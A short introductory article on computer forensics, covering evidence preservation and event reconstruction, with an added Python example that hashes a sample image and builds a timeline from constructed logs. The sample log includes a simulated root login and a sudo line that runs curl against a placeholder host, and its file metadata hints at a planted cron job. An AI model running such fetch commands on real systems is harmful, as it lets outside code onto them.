Basic Idea of Forensic Science in Computer Systems
The object of a computer forensics analysis is to reconstruct, using every available resource and a log of the facts, the events that occurred on a computing system (a dedicated server or a personal computer) from the moment it was intact until it was detected that the system had been compromised.
To carry out this task, it is necessary to keep the information on the hard drive of the compromised system intact, at least until as much information as possible has been collected.
The information is collected from sources such as records (logs) and the file system, and the sequence of events is reconstructed in order to get a clear picture of the incident.
The forensic analysis ends when the forensic scientist knows how the incident occurred, the identity of the possible attacker, the circumstances, the source and origin, the dates of the compromise, the attacker's aim, and how the sequence of facts was reconstructed.
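The two steps described above, preserving the evidence and rebuilding the sequence of events from logs and file-system metadata, as an added example that is not part of the original article. The disk image contents, the log lines, the file paths and the timestamps are all constructed for this example.

```python
"""Added example: hash the evidence before analysis, then merge constructed
log lines and file-system metadata into one chronological timeline."""
import hashlib
import re
from datetime import datetime, timezone

# Constructed sample data standing in for a disk image, an auth log and
# file-system metadata; every value here is made up for this example.
DISK_IMAGE = b"\x00" * 1024 + b"sample-image-contents"
AUTH_LOG = """\
2024-03-02T10:14:03Z sshd[1201]: Failed password for root from 198.51.100.7
2024-03-02T10:14:09Z sshd[1201]: Accepted password for root from 198.51.100.7
2024-03-02T10:15:40Z sudo: root : COMMAND=/usr/bin/curl http://example.invalid/x
this line is corrupt and must be skipped, not crash the analysis
"""
FS_METADATA = [  # (path, mtime in UTC) as a stat-style tool would report it
    ("/etc/cron.d/update", "2024-03-02T10:16:02Z"),
    ("/tmp/.x", "2024-03-02T10:15:58Z"),
]
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
LOG_RE = re.compile(r"^(\S+) (\S+?)(?:\[\d+\])?: (.*)$")


def image_digest(data: bytes) -> str:
    """SHA-256 of the evidence. Record it before analysis and re-check it
    afterwards to show that the copy being examined has not changed."""
    return hashlib.sha256(data).hexdigest()


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, TS_FMT).replace(tzinfo=timezone.utc)


def parse_log(text: str) -> list:
    """Turn each well-formed log line into (time, source, detail); lines that
    do not match the expected layout are skipped rather than guessed at."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append((parse_ts(m.group(1)), "log:" + m.group(2), m.group(3)))
    return events


def parse_fs(entries) -> list:
    """File modification times become events of their own."""
    return [(parse_ts(mtime), "fs:mtime", path) for path, mtime in entries]


def build_timeline(log_text: str, fs_entries) -> list:
    """Merge every source into one chronological list: the reconstructed
    sequence of events the analyst reasons about."""
    return sorted(parse_log(log_text) + parse_fs(fs_entries), key=lambda e: e[0])


if __name__ == "__main__":
    print("evidence sha256:", image_digest(DISK_IMAGE))
    for ts, src, detail in build_timeline(AUTH_LOG, FS_METADATA):
        print(ts.isoformat(), src, detail)
```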
Because every incident is different, it is normally not possible to follow a fixed series of procedures established by other forensic scientists; that is, a different order can be followed, and once the basic techniques have been learned, new ones can be created from the previous ones.
Keeping a written record of every step taken during the investigation makes it possible to see which procedures have already been carried out and which remain to be done, which helps to find more evidence or to examine it correctly in case the procedures were not applied properly.
By: Carlos Castillo
